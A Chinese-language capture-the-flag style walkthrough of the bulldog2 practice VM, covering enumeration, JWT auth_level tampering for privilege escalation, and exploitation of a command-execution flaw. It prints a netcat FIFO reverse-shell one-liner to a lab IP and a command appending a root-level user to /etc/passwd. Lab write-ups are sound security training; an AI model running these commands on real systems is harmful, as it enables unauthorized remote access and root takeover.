靶机实战(bulldog2)

实验环境

靶机:bulldog2
测试机:kali,win10

实验过程

信息收集

1.主机发现

靶机IP:192.168.238.149
在这里插入图片描述

2.端口扫描

只有80 端口
在这里插入图片描述
扫描服务,http开启的方法
在这里插入图片描述

3.目录扫描

在这里插入图片描述
没有什么有用的东西
在这里插入图片描述

4.漏洞发现

可以用searchsploit搜下nginx漏洞
在这里插入图片描述
页面发现登录和注册地址,尝试弱口令,爆破,万能密码,逻辑漏洞等
在这里插入图片描述
注册页面被限制
在这里插入图片描述
审查元素看一下,有无特殊路径,和前端源码
在这里插入图片描述
main.js文件中发现用户名遍历漏洞得到所有用户名
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
发现注册路径和关键参数
在这里插入图片描述
在这里插入图片描述
改包发送
在这里插入图片描述
登录成功
在这里插入图片描述
再注册一个查看是否存在越权
在这里插入图片描述
存在水平越权
在这里插入图片描述
登陆页面抓包重放,发现关键参数:“auth_level”:"standard_user"
在这里插入图片描述
回到main.js搜索关键字auth_level,发现管理员参数尝试垂直越权
在这里插入图片描述
https://jwt.io 解码
在这里插入图片描述
修改auth_level参数
在这里插入图片描述
利用bp修改回包
在这里插入图片描述
在这里插入图片描述
admin修改密码页面
在这里插入图片描述
尝试修改密码,将回报false改为true
在这里插入图片描述
提示登陆成功,但没什么效果
在这里插入图片描述
最后在github找源码发现命令执行漏洞
在这里插入图片描述

漏洞利用

反弹shell

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f | /bin/sh -i 2>&1|nc 192.168.238.143 443 >/tmp/f

在这里插入图片描述
在这里插入图片描述

提权

etc/passwd文件权限配置不当
在这里插入图片描述
生成密码

perl -le ‘print crypt('pass','aa')’

将用户名密码追加到passwd下

echo 'abcd:aaW3cJZ7OSoQM:0:0:dirty:/root:/bin/bash '>> /etc/passwd

在这里插入图片描述

在这里插入图片描述

总结

在发现只有80端口时,除常规web漏洞,还有http的PUT方法需验证 ;
可以审查查元素,看特殊路劲,和前端源码,或在github上找下源码,
对漏洞发现有很大帮助;登录口,可以抓包看回包的关键参数 (true,false,fail,suess等)进行修改尝试逻辑漏洞;有注册,可以先注册个
账户 再尝试水平,垂直越权等;拿到shell先看一些关键配置文件

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值